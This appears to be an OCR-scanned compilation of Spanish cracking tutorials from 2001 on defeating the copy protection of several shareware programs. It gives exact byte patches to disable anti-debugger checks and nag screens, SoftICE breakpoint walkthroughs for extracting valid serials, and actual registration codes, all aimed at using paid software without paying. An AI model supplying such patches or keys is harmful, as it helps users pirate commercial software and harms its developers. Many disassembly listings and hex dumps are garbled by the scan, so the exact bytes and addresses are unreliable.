:006DE7EC 68000000C0 push C0000000 


* Possible StringData Ref from Code Obj ->"AX.ASICE" 


:006DE7F1 680CE86D00 push 006DE80C 


* Reference To: kernel32.CreateFileA, Ord:0000h 


:O006DE7F6 E81197D2FF Call 00407F0C 

:O06DE7FB 83F8FF cmp eax, FEFFFFFEFEF 

:O06DE7FE 7408 je 006DE808 <== otra zona caliente :) 
:006DE800 50 push eax 


El asunto es simple: ambos saltos son JE (salta si es igual), pero si tenemos cargado el Softl CE el valor no es igual y 
obviamente estos no saltarán , por lo tanto el programa no se iniciará porque ha encontrado al Softl CE, entonces lo 
que debemos hacer es cambiar los saltos para que estos siempre salten sin importar el valor que tengan, cambiar los 
JE a JUMP, es decir: 


e El primer salto: 
ORI GI NAL 
:006DE83A 7408 je 006DE844 
PARCHADO 
:006DE83A EB08 jump 006DE844 
e El segundo salto: 
ORI GI NAL 
:O006DE7FE 7408 je 006DE808 
PARCHADO 
:O006DE7FE EB08 jump 006DE808 
Ahora buscamos los offsets de los saltos en la parte inferior del W32Dasm, se verá algo así... 


El primero: 


Line:1502630 Pg 18783 and 18784 of 18803 Code Data O:006DE83A GOffset 002DDC3A in File: Biker.exe 


El segundo: 


Line:1502572 Pg 18782 and 18783 of 18803 Code Data O:006DE7FE OOffset 002DDBFE in File: Biker.exe 


Anotamos ambos offsets (2DDC3A;2DDBFE) para ir al Hex Workshop y hacerle una cirugía menor al programa para 
quitarle la protección ANTI -Softl CE. 


A continuación... cerramos W32Dasm y abrimos Hex Workshop 


| Parchando el ANTI-SoftlCE 


Abrimos el Hex Workshop y vamos a File > Open... y buscamos el ejecutable del programa (Biker.exe), y una vez 
que lo hemos encontrado vamos a Edit > Goto... insertamos el primer offset y cambiamos el 7408 a EBO8, y luego 
hacemos lo mismo con el segundo offset. Guardamos los cambios y listo!! PROTECCION ANTI -Softl CE anulada. 


| Buscando el código de registro 


Mmm, parecía una protección por lo menos casi digna, pero mientras analizaba el listado muerto del programa en el 
W32Dasm me encontré con una sorpresa en las String Data References, la que luce así... 


'"7SNN" 

"7SS" 

"7SSS" 

"ng" 

"977-0956-38806" 

"9999" 

"9| nvalid BLOB field count in data " 
"A primary index is already defined " 
"A riders name can not contain " 


Parece un código de registro, no? :) ya lo hemos encontrado, ahora sólo debemos ir a la caja de registro e insertarlo 
977-0956-38806 y... 


Bikers Log Successfully Unlocked. 


Lamentablemente estos tipos se preocuparon del Softl CE, pero no se preocuparon de esconder el código de registro en 
un lugar seguro :), se confiaron demasiado en el ASPack y ellos mejor que nadie deberían saber que toda protección 
tarde o temprano será crackeada. 


Programa crackeado... 


a] 


Soy humano y cometo errores, si encuentras uno házmelo saber OK. actmagoG'hotmail. com 


| Saludos 


e PrEfEsOr X ( my best friend ) 
e [KRaViTZ] ( suerte amigo ) 


e [ DeK_OIiN ], Txeli, CODE_MEX, Metamorfer, Txotxo, Raziel 


e Karpoff http: //welcome.to/karpoff 


e Xasx de TNT! http://www.tntcrackers.ws 


e VIPER ( creador de file insPEctor ) file insPEctor web site http: //www.finspec.swsites. net/index. htm 


e Toda la people de TUTORIALES 2001 
e LdA 42A 2000 For Ever!! :) 


e Saludos a todos los crackers del mundo. 


| Chao!! 


Espero que hayan disfrutado leyendo este tutorial y que les sirva para incrementar sus habilidades, pero recuerden, 
lean muchos tutoriales, practiquen, estudien y CRACKEAR será mucho más fácil. 


Act MagO 23 


Karpoff Spanish Tutor: Pagina dedicada a la divulgacion de informacion en Castellano, sobre 


Ingenieria Inversa y Programacion. Email "Colabora con tus Proyectos" 


Programa: 


PROTECCION: 
Objetivo: 
Descripcion: 
Dificultad: 
DOWNLOAD: 
Herramientas: 


CRACKER: 


Karpoff Spanish Tutor 


DeBoard Video Display Software 2/8/2001 


Name / Serial. 


Buscar Un serial Valido 


Principiante 
htt://www.internetsoftwareshop.com/apps/deboard.exe 
Softice 


SiLvEr StOrM FECHA: 6/04/2001 


INTRODUCCION 


Welcome to everybody....hay me equivoque de idioma...bueno mi 4to tutorial.. creo que estoy mejorando.. 
gracias a todos Uds..., espero que lo entiendan y les sea util. Recuerden que este tutorial esta hecho con 


fines netamente educativos si les interesa este Programa COMPRENLO, (aunque a mi parecer este 
programa es extremadamente caro... 200$. 


AL ATAKE 


Comentario del Programa 


e El programa que elegimos es un aaahhhhhhhhhhh... me da flojera traducir todo esto... se los dejo como tarea.. 


e PC Graphic Video Display System for any occasion. This is a Scrolling/Crawling-4 monitor Software 
A PC video display system for any presentation. DeBoard supports up to four different monitors or four different video outputs at the 
same time with four different contents! Because DeBoard is thread based you can adjust the scroll, crawl and image box speeds to 
match your needs. The NT version can play AVI files and graphic images while scrolling. DeBoard also provides images wipes, anti- 
aliased text, page flips, temperature probe capabilities and much much more. Once the program is configured it is very easy to use and 
maintain. Includes a file transfer program to upload text files while remote DeBoard is running 

e Costoso : 200$ 


Objetivos 
1. Buscar un serial Valido 


Manos a la Obra 


Primero instalaremos nuestro programa: y luego lo ejecutamos. 


SiLvEr StOrh 
11213 14 15 16 17 f8 


AA —Á 


TextFile3 loaded : DISCLAIM. txt CAárchivos de programa +DAS-Digitrax Services DAS DeBoardsS ample.SFG 


Presionamos Register : y nos aparece una pantalla como la anterior. 
Introducimos nuestros Datos:EJ. name:SiLvEr StOrM 


y un serial de 8 caracteres:12345678 


A BusKar El Zeryal 


Ok.. 


Aqui comenzamos el trabajo duro.... me llevo como 20 minutos revisando todos estos registros... por cierto tengo algo importante que hacer regreso en unos 
minutos... ZZZZZZLZZLZZZZZZLZZZZ... 


a h hH.. ya regrese... a ver por donde quedamos.... ok.. ya vi... perfekto 
como siempre Presionamos "CONTROL D" y usaremos el bpx mas usado.... digo por mi... 


BPX HMEMCPY enter... y "CONTROL D"” para salir de Sice... 
y Presionamos REGISTER .... 


veremos como sale de nuevo SICE a ayudarnos en nuestra labor.... 
Quitamos los bp bd * enter 
Presionamos F12 


Presionamos 79 veces F10 


y estaremos aqui en el codigo del programa 


015F:0071ECE8 ?? 9? 9? 9? 9? 92 92 22-92 92 92 92 9 YI ici 
015F:0071ECF8 22 22 22 22 22 22 22 22-22 22.22 22 92 22 22M ncccnnnon 
A A A PROT32- 


0157:0043505C CALL USER32!'CallWindowProcA 2 
0157:00435061 MOV [EBX+0C],EAX DS:0061ED4C=00000000 <------ caemos aqui... 
0157:00435064 MOV EAX,[EBX] 
0157:00435066 CMP EAX,0C 
0157:00435069 JNZ 00435086 
0157:0043506B MOV EDX,[EBX+08] 
0157:0043506E PUSH EDX 
0157:0043506F MOV ECX,[EBX+04] 
0157:00435072 MOV EDX,EAX 
0157:00435074 MOV EAX,ESI 
0157:00435076 CALL 0043119C 
0157:0043507B JMP 00435086 
0157:0043507D MOV EDX,EBX 
0157:0043507F MOV EAX,ESI 


0157:00435081 CALL 004327B0 


0157:00435086 POP EBP < > 


De aqui en adelante empezamos a ver todos lo que tiene contenido en el registro EDX (d edx) 
la primera vez veremos nuestro numero (12345678) 
seguimos bajando dentro del codigo con F10 hasta que en otro EDX veremos nuestro nombre (el que introdugimos anteriormente) 


a ed bitéssssessid PROBE 
015F:0061EDB5 53 69 4C 76 45 72 20 53-74 4F 72 4D 00 00 00 00 SiLvEr StOrM..... 
015F:0061EDCS5 00 00 00 00 00 00 00 00-00 00 00 00 00 00 0000 ................ 
015F:0061EDDS 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00.00 ................ y 
A PROT32- 

0157:004890A1 LEA EDX.[EBP-0128] " 

0157:004890A7 CALL 00408430 * 

0157:004890AC MOV EDX,[EBP-0128] 

0157:004890B2 LEA EAX,[EBP-0104] 

0157:004890B8 MOV ECX.000000FF 

0157:004890BD CALL 004041B8 

0157:004890C2 LEA EDX,[EBP-0104] SS:0061EDB4=4C69530C <-------- aqui en edx (d edx) 


0157:004890C8 XOR ECX,ECX 


0157:004890CA MOV EAX,[EBX+000002FC] 
0157:004890D0 CALL 00464CDC 
0157:004890D3 LEA EDX,[EBP-04] 
0157:004890D8 MOV EAX,[EBX+000002C4] 
0157:004890DE CALL 004315C8 
0157:004890E3 MOV EAX,[EBP-04] 
0157:004890E6 LEA EDX,[EBP-0128] v 


0157:004890EC CALL 00408430 < > v 


Presionamos 4 veces mas ElO ... calma no se apuren... ya se que eso de estar contando es fastidioso. 
decirles a Uds. cuantas veces hay que presionar esta tecla... la verdad perdi la cuenta como 10 veces 


No se les olvide que estamos viendo en EDX... 


015F:0061ECDO 09 24 33 43 39 30 34 31-31 46 00 00 3C ED 61 09 .$3C90411F..<.a.? 
015F:0061ECEO0 24 36 44 44 30 36 30 32-46 0C 53 69 4C 76 45 72 $6DD0602F.SiLvEr” 
015F:0061ECFO0 20 53 74 4F 72 4D 0B 0B-0B 0B 0B 0B 0B 0B 0B 0B StOrM.......... 
015F:0061ED00 OB 0B 0B 0B 0B 0B 0B 0B-0B 0B 0B 0B 0B 0B 0B OB ................ 
015F:0061ED10 0B 0B 0B 0B 0B 0B 0B 0B-0B 0B 0B 0B 09 24 36 36 ............. $66 


015F:0061ED20 44 44 35 32 46 31 0C 53-69 4C 76 45 72 20 53 74 DD52F1.SiLvEr St 


. pero imaginenme a mi contando para 
.. . Creo que ya aprendi a contar .. Jee Jeee 


015F:0061ED30 4F 72 4D 0B 0B 0B 0B 0B-0B 0B 0B 0B 0B 0B 0B 0B OrM............. 


015F:0061ED40 0B 0B 0B 0B 0B 0B 0B 0B-0B 0B 0B 0B 0B 0B 0B 0B ................ y 
015F:0061ED50 0B OB 0B 0B 0B 0B 0B 0B-0B 09 24 36 36 44 44 35 .......... $66DD5v 
A PROT32- 


0157:004890A1 LEA EDX,[EBP-0128] 
0157:004890A7 CALL 00408430 

0157:004890AC MOV EDX,[EBP-0128] 

0157:004890B2 LEA EAX,[EBP-0104] 

0157:004890B8 MOV ECX,000000FF 

0157:004890BD CALL 004041B8 

0157:004890C2 LEA EDX,[EBP-0104] <------------ es aqui......... ya dejen de presionar F10.. ALTO.... 
0157:004890C8 XOR ECX,ECX 

0157:004890CA MOV EAX,[EBX+000002FC] v 


0157:004890D0 CALL 00464CDC < > v 


Anotamos ese numerito... (el que vemos en EDX) 
Salimos de SiCe... "CONTROL D 


Introducimos ese numerito... y .. Que paso... no funciono... 


SI, SIFUNCIONO:::: 
Otro programa mas crackeado... 


AH se me olvidaba decirles... este programa cuando lo registras crea un archivo con extenxion .key...si borran este archivo tienen que 
introducir de nuevo la clave de activacion... 


nO0TAS 


Este mismo esquema lo usan todos los programas de esta casa de software asi que pueden practicar con todos ellos. 


ESPERO ... les sirva de algo este tutorial para aumentar sus conocimientos en el arte del cracking........ 
Saludos 


e Profesor_x 


e Toda la gente de TUTORIALES2000. 


e Saludos a todos los crackers del mundo. 


Chao!! 


SiLvEr StOrM 


SiLvEr StOrM_ 2001 EChotmail.com 


Karpoff Spanish Tutor: Pagina dedicada a la divulgacion de informacion en Castellano, sobre 


Ingenieria Inversa y Programacion. Email "Colabora con tus Proyectos" 


Karpoff Spanish Tutor 2001 


| FullDisk v3.1 


Tipo de Manual Eliminar un molesto NAG 


CRACKER: RuL FECHA: 04/04/2001 


INTRODUCCION 


NOMBRE del PROGRAMA: Ful/Disk 
Version: 3.1 
Tamaño: 99'5 Kb 
Protección: NAG-SCREEN 
URL: ¿2 
Dificultad Moderada 
Herramientas utilizadas: Softlce, W32dasm 8.9, Hexview y file-inPEctor (opc.) 


Se trata de un programita muy sencillo (y no por ello barato) que nos informa del espacion que nos queda 
disponible en el disco duro, de cuanto ocupa cada directorio, y varias cosas más. 
Si no encontrais el archivo para poder practicar con él, mandadme un mail y os lo pasaré, y si tenéis alguna duda 
no dudeis en escribirme, solo quiero una cosa NO ME PIDAIS CRACKS (http://astalavista.boxX.sk) 


RuL- rulzgz(dpunkass.com - 4/4/2001 


AL ATAKE 


:: 12 APROXIMACIÓN :: 


| Lo primero de todo es recabar información acerca de nuestro objetivo, usando el file inPEctor vemos ke esta programado en Visual 
C++ 4.2 y ke no está ni encriptao ni nada (mejor pa nosotros :) 


Observando el programa me doy kuenta de ke no hay ninguna opción desabilitada, lo uniko ke fastidia de no tener registrado el 
programa (10$ me parece mucho para lo ke hace el programa :) es un NAG kada vez ke salimos del programa, asi ke he decidido ir 
a por el NAG directamente, no intentar registrar el programa, mas que nada porke kasi nunca he crackeao NAGs y me llama más la 

atención. 


:: VAMOS A POR EL NAG :: 


Lo primero de todo desemsamblamos el ejecutable con W32dasm, y miramos un poko por encima. Y en la primera parte del kodigo 
veo algo MUY interesante (de casualidad :): 


A A 4444 DIALOG INFORMATION 444++4+4++444++4+++ // Fijaros en esta seccion 

[....] 

Name: DialoglD_0067, + of Controls=006, Caption:"How did you like FullDisk?", ClassName:"" // ¿Os suena? 

001 - ControllD:0002, Control Class:"BUTTON" Control Text:"Tell me more now" // :) 

002 - ControllD:0001, Control Class:"BUTTON" Control Text:"I will register soon" // Exacto!! es exactamente lo ke pone en el NAG 
003 - ControllD:FFFF, Control Class:"STATIC" Control Text:"Send comments to the Author," 

004 - ControllD:FFFF, Control Class:"BUTTON" Control Text:"" 

| 005 - ControllD:FFFF, Control Class:"BUTTON" Control Text:"" 


| Bueno ahora tenemos que buscar donde se usa esto, para eso pulsamos el Botón Dialog References (al lado de Str Ref) y 
| hacemos doble click en "Dialog: DialoglD_0067", esto lo repetimos varias veces para ver si hay mas de una referencia y en efecto, 
hay 3: 


¡* Possible Reference to Dialog: DialoglD_0067 


| 
:00402415 6A67 push 00000067 // Apuntamos 00402415 


* Possible Reference to Dialog: DialoglD_0067 


| 
:00403163 6A67 push 00000067 // Apuntamos 00403163 


| * Possible Reference to Dialog: DialoglD_0067 
Ñ 
| :00409735 6A67 push 00000067 // Apuntamos 00409735 


Mu bien ahora tenemos ke sabes kual es el kausante del NAG kuando salimos, asi ke abrimos en SYMBOL LOADER (Softlce) , 
abrimos nuestro ejecutable y le damos a Load despues de un mensaje de error (no os preocupeis, sale SIEMPRE) aparecemos en 
el Softlce (a partir de ahora lo llamare Sl ). Komo no sabemos kon seguridad kual de los tres es el ke provoca nuestra NAG, ni cortos 
ni perezosos le klavamos 3 Breakpoints :) 


Bpx 00402415 
Bpx 00403163 
Bpx 00409735 


Echo esto pulsamos F5 y volvemos ha windows, el programa esta ejecutandose asi ke lo cerramos y !!Eurekaj¡¡ Salta uno de los 
breakpoints ke hemos kolokao, exactamente el de 00409735. 


Bueno ya sabemos kual de los tres es el kulpable, ahora debemos encontrar el lugar exacto donde se genera el NAG, asi ke 
komenzamos a Tracear con F10, hasta ke en una CALL bastante alejada, aparece nuestra NAG, exactamente en esta: 


015F:0040262C E83DA30000 Call 0040C96E 


| Umm, interesante pero todavia no es definitivo por lo k tendremos ke ahondar un poko más :) borramos todos los Breackpoints (Bc *) 
y ponemos 

Bpx 0040262C y reiniciamos el proceso, te recuerdo: Cargamos el ejecutable con el Symbol Loader, pulsamos F5 y cerramos el 

ejecutable para ke aparezca el NAG. Al hacer esto salta de nuevo el SI en el CALL anterior, tenemos ke seguir traceando solo ke 

ahora en vez de usar F10 (ejecuta todo el CALL de tiron) usaremos F8 ke es igual ke F10 solo ke ejecuta las instrucciones de la 


CALL paso a paso. 


Pues eso pulsamos F8 y ya estamos dentro de la CALL, ahora ke ya estamos dentro del CALL usamos F10 y traceamos como 
antes, esta vez aparece el NAG al pasar por..... pero ke **** pasa!!? ke es eso!!?? 


Si os fijais en la linea de abajo pone algo asi, pos esto simplemente indica ke el ultimo JMP saltaba a MFC40.DLL :) asi ke el primer 
CALL (00402620) es el ke nos interesa parchear asi ke al tajo :) 


:: VAMOS A PARCHEAR :: 


Parece claro lo ke hay ke hacer ,no?¿ Lo primero ke tenemos ke kalkular es el OFFSET (recuerda ke lo ke sabemos el la direccion 
RVA, es decir, la dirección en memoria) para averiguarlo usaremos file insPEctor. 


Le damos a Abrir Archivo seleccionamos fulldisk.exe y le damos a Analizar, Seleccionamos la pestaña Herramientas y en donde 
pone RVA to OFFSET escribimos: 


0040262C == pulsamos boton ==> 00001A2C 
RVA ==============> OFFSET 


Mu bien ahora ya podemos parchear eso :) pero primero kiero ke os fijeis en una kosa, si entrais en el HEXVIEW y os limitais a 
NOPear (cambiar E83DA30000 por 9090909090 (90 es la instruccion NO OPeration en hexadecimal)) no funsionará por lo siguiente, 
fijemonos en ejecutable desemsamblado: 


:0040262C E83DA30000 Call 0040C96E // CALL ke genera nuestro NAG 
:00402631 83F801 cmp eax, 00000001 // Aki kompara EAX con 1, espera ke despues del CALL salga con 0 o 1 asi ke si nopeamos 


lo anterior EAX llega 
:00402634 0F850B000000 ¡ne 00402645 // aki con el valor ke tuviera antes, lo ke podria hacer ke se kolgara el ordenador 


Asi ke tenemos ke hacer ke EAX llegue ahi con valor 1 (si EAX=1 sale), y ¿komo lo hacemos? pos sencillo, poniendo en lugar del 
CALL la instruccion 
Mov EAX, 00000001 esto en hexadecimal es B801000000 (nos viene muy bien) 


Asi ke abrimos Hexview o kualkier otro editor hexadecimal y en el OFFSET 1A2C cambiamos E83DA30000 por B801000000 y listo 
:) 


:: SALUDOS :: 


Mr.Silver - [thEpOpE] - Karpoff - Mr.Nobody - Albrto - MORkO - Webon - ZiB - Snaper - BloodyMer - nano_ -etc.... 
y por supuesto a la gente de HAtRiO y Hcrackers del irc.hispano.org 


Cracked By RuL :: rulzgzfGpunkass.com 


"Pensais que todo tiene un límite, asi estais todos... LIMITADOS" - ESKORBUTO 


Karpoff Spanish Tutor: Pagina dedicada a la divulgacion de informacion en Castellano, sobre 
Email "Colabora con tus Proyectos" 


Ingenieria Inversa y Programacion. 


Karpoff Spanish Tutor 
e Talking E-Mail v 3.0 


PROTECCION: Name/serial 

Objetivo: Buscar un Numero de Serie Valido 

Descripcion: Programa para recuperar archivos borrados. 

Dificultad: Principiante 

DOWNLOAD: http://www.4Adevelopers.com/ 

Herramientas: Softece v4.0 

CRACKER: Profesor_X FECHA: 15/04/2001 


INTRODUCCION 


Hola Amigos otro programa mas que analizamos, en este tutorial veremos como encontrar un numero de 
serie valido para el Talking E-Mail v 3.0 de la empresa 4developers que se especializa en 
desarrollar utilerias para windows algunas muy buenas ........ como podran ver 
aumente una nueva seccion que se llama : VALORACION DEL SOFTWARE en la cual 
pondremos la calificacion que se merece segun mi punto de vista, tomando en cuenta 
los siguientes parametros: 


1. sistema de proteccion 


2. Funcionalidad 
3. Calidad en programación 


AL ATAKE 


Comentario del Programa 


e El show de hoy estara a cargo de un programa que a mi parecer es bueno para quienes gustan de que la Pcera les hable 
cuando llegue un E-mail, tiene muy buenas caracteristicas el Talking E-Mail v 3.0 , es bueno bajenlo y usenlo......yo tenia 
pensado hacer un solo tutorial para mostrales como se desprotegen todos los sharewares de esta empresa pero me lleve 
un chasco cuando quise ver otro shareware que ofrecen, . que decidi hacer un tutorial para cada uno..... 


Objetivos 
1. Buscar un Numero de serie valido 


Manos a la Obra (Metodo 1 ) 


Bueno amigos empezemos con este Taco de Cochinita Pibil !!!! J EJ EJ EJ EJ ..... lo primero que haremos es analizar el programa 
para ver si esta empakado y en que lenguaje fue hecho, con la herramienta llamada Lenguaje 2000 y nos mostrara esto: 


$ C Archivos de programaleT alk1T alkMail exe 


mmmm....como podemos ver esta hecho en visual Basic v 5.0 y no esta empacado ni nada de nada. ..jejeje.... continuemos...... 
ahora abramos el programa y nos aparecera una ventana como esta: 


Talking E-mail - UNREGISTERED VERSION 


TE) 


UNREGISTERED USER] 


la que nos dice que es una version Trial y que tenemos 14 dias para probarlo, insertamos un nombre y numero de serie y damos 
click en UNLOCK y nos manda el siguiente mensaje: 


JUNREGISTERED User 


¡ 
es 


OK! ahora vamos y reiniciamos la Pcera con el Soft Ice, y ponemos un breakpoint en _ VBASTRCMP y !!!! QUE no te 
acepta el breakpoint ? .... jejejejje para que te lo acepte debes de abrir el WINICE.DAT y añadir en la seccion que aparece 
abajo, las lineas de color anaranjado, estas son para que acepte las funciones de Visual Basic.... 


EN OOO IOIÓN 


; If your have MORE than 32MB of physical memory installed, change 
; the PHYSMB line to the correct + of Megabytes. 

; If you have LESS than 32MB you can save a bit of memory by 

; specifying the correct ++ of Megabytes 

; Example: PHYSMB=32 

q IEA e e e e e e e e e le e ll ll 
EXP=c.Wwindowsisystemikernel32.dll 
EXP=c.Wwindowsisystemiuser32.dll 
EXP=cWwindowsisystemigdi32.dll 
EXP=cWwindowsisystemicomdlg32.dll 
EXP=cWwindowsisystemishell32.d1l 
EXP=cWwindowsisystemishell232.dll 
EXP=CAwindowslsystemiadvapi32.dll 
EXP=C:Wwindowsisystemivb40032.dll ;<--VB4 runtime file 
EXP=C:Wwindowsisystemimsvbvm50.dll ;<--VB5 runtime file 
EXP=C:Wwindowsisystemimsvbvm60.dll ;<--VB5 runtime file 


Ahora si regresamos al sofice dando CONTROL D y ponemos el Break POint y siiiiii nos lo acepta....jejejje --- damos CONTROL D 


otra vez y regresamos al programa, damos click en UNLOCKy saltamos directamente al Soft Ice y damos F12 una sola vez y caemos 


en esta parte del codigo : 


PROT32- 
0167:00453FC0 FF1594134800 CALL [MSVBVM50!__ vbasStrCmp] e 
0167:00453FC6 85C0 TEST EAX, EAX $ 
0167:00453FC8 7528 JINZ 00453FF2 
0167:00453FCA 8B16 MOV EDX, [ESI] 
0167:00453FCC. 56 PUSH ESI 
0167:00453FCD FF92FC060000 CALL [EDX+000006FC] 
0167:00453FD3  3BC3 CMP EAX, EBX 
0167:00453FD5 0F8D48020000 JGE 00454223 
0167:00453FDB 68FC060000 PUSH 000006Fc 
0167:00453FE0 68489F4100 PUSH 00419F48 
0167:00453FE5 56 PUSH ESI 
0167:00453FE6 50 PUSH EAX 
0167:00453FE7 FF150C134800 CALL [MSVBVM50!__vbaHresultCheckO0b3|] 
0167:00453FED E931020000 JMP 00454223 
0167:00453FF2 8D45E0 LEA EAX, [EBP-20] 
0167:00453FF5 8D4DD8 LEA ECX, [EBP-28] 


TALKMAIL! .text+00052FC0 


caemos en 0167:00453FC6 85C0 TEST EAX,EAX ahi damos D EDX y nos aparecera la siguiente informacion en la ventana de datos : 


016F:004C5D0C 00320031 00340033 00360035 00380037 1.2.3.4.5.6.7.8. 
016F:004C5D1C 00390039 00000000 00000000 A0000024 RA 5... a 
016F:004C5D2C 00000014 00320031 00340033 00360035 E AS E 
016F:004C5D3C 00380037 00390039 00000000 01000000 E A 


016F:004C5D4C A0000024 00000016 00650047 00540074 tato G.e.t.T 
016F:004C5D5C 00700079 00490065 0066006E 0000006F y.p.e.I.n.f.o 
016F:004C5D6C 0000003D A0000034 TFBDABBO 004C76E0 A £127;.vL 
016F:004C5D7C 00000001 004C59B0 004C5ACO 004C5EE4 ——— ..... Yi. 2 Di De 
016F:004C5D8C 004C5AF8 00000000 00020400 00000000 LV te taa 
016F:004C5D9C 000000CO 46000000 A0000028 00000024 ——-—- ....... F(...$ 
016F:004C5DAC 00000000 00000000 00000000 00000000 —-—-—-—- ...oocoooooooo.... 
016F:004C5DBC 004C5DD4 004C5A70 004C58E0 004C56D4 .]L.pZL..XL..VL. 
016F:004C5DCC ADO00010 0000000B  6D77736D 000067783 ........ mswmsQg.. 
016F:004C5DDC A0000034 TFBDABBO 004C76E0 00000001 Artea da ELIT a 
016F:004C5DEC 004C57F4  004C5930 004C5E5C  004C5E14 .WL.OYL.A%L.."L. v 
si lo que coloreee de verde parece ser nuestro numero de serie que insertamos ..... jejejeje creo que vamos bien ........ despues 
de ahi vamos traceando con F10 hasta llegar a esta parte del codigo : 

a MSVBVM50!__ vbaStrMove+001A PROT32- 
0167:0F01F8F4 EBFO JMP 0FO1F8E6 a 
MSVBVM50!__ vbaStrCmp $ 
0167:0FO1F8F6 FF742408 PUSH DWORD PTR [ESP+08] 

0167:0FO01F8FA FF742408 PUSH DWORD PTR [ESP+08] 

0167:0F01F8FE 6A00 PUSH 00 

0167:0F01F900  E85E3CFEFF CALL MSVBVM50!__ vbaStrComp 

0167:0F01F905 OFBFCO MOVSX EAX, AX 

0167:0F01F908 C20800 RET 0008 

MSVBVM50!__vbaChkstk 

0167:0F01F90B 51 PUSH ECX 


MSVBVM50! .text+0001E8F4 


vamos traceando hasta llegar a 0167:0FO1F8FE 6A00 PUSH 00 en la cual daremos D EDX y vemos la ventana de datos y nos aparecen 


unos numeros extraños en la direccion de memoria virtual 016F:004C48C8 


016F:004C48C8 00340038 


016F: 


016F: 


016F: 


016F: 


016F: 


016F: 


016F: 


004C48D8 


004C48E8 


004C48F8 


004C4908 


004C4918 


004C4928 


004C4938 


Talkmg E-mail Message 


0047004E 


005Cc005€ 


00000002 


00390038 


A0000111 


00000001 


00000001 


00390036 


00390032 


00680043 


0000002B 


0047004E 


0049003C 


00000000 


004C494C 


0026002D 


00510038 


003D0072 


00390036 


00390032 


0049002C€ 


00000003 


0000001A 


[HKEY_LOCAL_MACHINE SoftwareWDevelopersteTalk] 


00390038 


0000002B 


A0000024 


0026002D 


00000038 


00000000 


00000000 


00000000 


[HKEY_LOCAL_MACHINESoftwareWDevelopersteTalkAAppPath] 
E="CMARCHIV=-IMETALK" 


[HKEY_LOCAL_MACHINE SoftwareWDevelopersteTalkWUser] 


(2="profesor x" 


[HKEY_LOCAL_MACHINE SoftwareWDevelopersteTalkMRegCode] 
="8469-£:89NG298Q+" 


ahora si podemos decir ....... PROGRAMA CRACKEADO 


8.4.6.9.-.6.8.9. 


nO0TAS 


ESPERO ... les sirva de algo este tutorial para aumentar sus conocimientos en el arte del cracking......... Soy humano y cometo 
errores, si encuentras uno házmelo saber OK. PROFESOR_X 


UNA COSA MUY IMPORTANTE SI QUIERES QUE TUS TUTORIALES APARESCAN EN LA COMPILACION DE TUTORIALES 2000 
MANDAMELOS A MI EMAIL...... 


Saludos 
e. [DeK_OiN ] 
e. Act MAgO 
e. ¡TeD 


SIR DREAM 


e. POTHEAD 
. VluGo 

e CrKViz 

e Txeli 

e Kuato_Thor 
e CODE_MEX 


Metamorfer 


e Txotxo 
e Raziel 
e Turbop 


Karpoff http: // welcome.to/ karpoff 


Xasx de TNT! http://www.tntcrackers. ws 


e Viper ( creador de file insPEctor ) file insPEctor web site http: / / www. finspec. swsites. net/ index. htm 


Toda la people de TUTORIALES2000. 


Saludos a todos los crackers del mundo. 


Chao!! 


Espero que hayan disfrutado leyendo este tutorial y que les sirva para incrementar sus habilidades, pero recuerden, lean muchos 


tutoriales, practiquen, estudien y CRACKEAR será mucho más fácil. 


Karpoff Spanish Tutor: Pagina dedicada a la divulgacion de informacion en Castellano, sobre 


Ingenieria Inversa y Programacion. Email "Colabora con tus Proyectos" 


Programa: 


PROTECCION: 
Objetivo: 
Descripcion: 
Dificultad: 
DOWNLOAD: 
Herramientas: 


CRACKER: 


Karpoff Spanish Tutor 2001 
Irfan View v 3,33 


Name / Serial 


Buscar un serial valido 


Principiante 


http://www.irfanview.com 


Softice 3x 


Profesor_X FECHA: 15/04/2001 


INTRODUCCION 


Hola Amigos otro programa mas que analizamos, en este tutorial veremos como encontrar un numero de 
serie valido para el Irfan View v 3.33 de la empresa Irfan Skiljan que se especializa en 
desarrollar utilerias para windows algunas muy buenas ........ como podran ver 
aumente una nueva seccion que se llama : VALORACION DEL SOFTWARE en la cual 
pondremos la calificacion que se merece segun mi punto de vista, tomando en cuenta 
los siguientes parametros: 


1. sistema de proteccion 


2. Funcionalidad 
3. Calidad en programación 


AL ATAKE 


Comentario del Programa 


e El show de hoy estara a cargo de un programa que a mi parecer es bueno para quienes gustan de un solo programa 
con el cual puedan ver todas sus imagenes no importando el formato que sea, tiene muy buenas caracteristicas el 
Irfan View v 3,33 , pruebenlo y veran que vale la pena, quiero aclarar que hay mejores aplicaciones para 
visualización de imagenes. 


Objetivos 


1. Buscar un numero de serie 


Manos a la Obra 


Bueno amigos empezemos con este Taco de salchica en escabeche...!!!! J EJ EJ EJ E) ..... lo primero que haremos es 
analizar el programa para ver si esta empakado y en que lenguaje fue hecho, con la herramienta llamada Lenguaje 2000 y 
nos mostrara esto: 


> CiProgram Files Uan View u_view32 exe 


mmmm....como podemos ver esta hecho en visual C++y esta empacado con el paker mas conocido de todos el Aspack v 
1.08, jjejjejje ok ahora abramos el programa y busquemos si tiene una opcion para insertar un serial... y despues de un 
rato encontramos esa opcion..en el menu Help > Registration y nos aparece esta ventanita : 


ianView - Hegistration 


Se 
ra 


en la cual insertaremos un nombre y numero de serie y damos click en OK y nos manda un mensaje como este: 


IrfanYiew 


OK! ahora vamos y reiniciamos la Pcera con el Soft Ice, y ejecutamos el Irfan View v 3,33 y vamos al dialogo de 
registro e insertamos unos datos, pero antes de dar OK vamos y damos CONTROL D y ponemos un Break POint en 
MESSAGEBOXA, damos CONTROL D otra vez y ahora si damos click en OK y saltamos inmediatamente a el 
softice, damos F12 una sola vez y caemos en esta parte del codigo: 


016F:0073EF54 35 33 32 31 31 30 38 30-38 00 44 00 00 00 40 00  532110808.D...t.” 

016F:0073EF64 00 00 00 00 98 8C 44 00-A0 F5 73 00 A0 F6 73 00. ...... Dir 

016F:0073EF74 BC F8 73 00 2C 89 00 00-D4 F8 73 00 08 F9 73 00. ..S.r..... SV 

016F:0073EF84 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00. .cccococoooo.o... v 
PROT32 

0167:00448C92 50 PUSH EAX 

0167:00448C93 E8088EFEFF CALL 00431AA0 

0167:00448C98 83C408 ADD ESP, 08 

0167:00448C9B  85C0 TEST EAX, EAX 

0167:00448C9D 752D JNZ 00448Cccc 

0167:00448C9F  8BODC4FF4C00 MOV ECX, [004CFFC4] 

0167:00448CA5 8B15A0284E00 MOV EDX, [004E28A0] 

0167:00448CAB 6830200000 PUSH 00002030 

0167:00448CB0 68003A4E00 PUSH 004E3A00 

0167:00448CB5 51 PUSH ECX 

